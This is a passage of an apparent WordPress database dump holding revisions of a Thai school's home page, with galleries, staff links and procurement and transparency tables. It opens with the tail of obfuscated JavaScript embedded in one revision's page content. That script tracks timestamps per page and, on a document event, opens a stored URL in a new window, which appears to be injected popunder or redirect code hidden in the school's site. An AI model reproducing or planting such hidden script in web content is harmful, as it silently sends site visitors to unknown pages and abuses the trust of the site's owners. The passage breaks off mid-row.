_0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-03 11:59:35','2025-07-03 04:59:35','',14,'http://pakhaeng.ssk.in.th/?p=1655',0,'revision','',0),
(1656,1,'2025-07-03 12:00:02','2025-07-03 05:00:02','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" 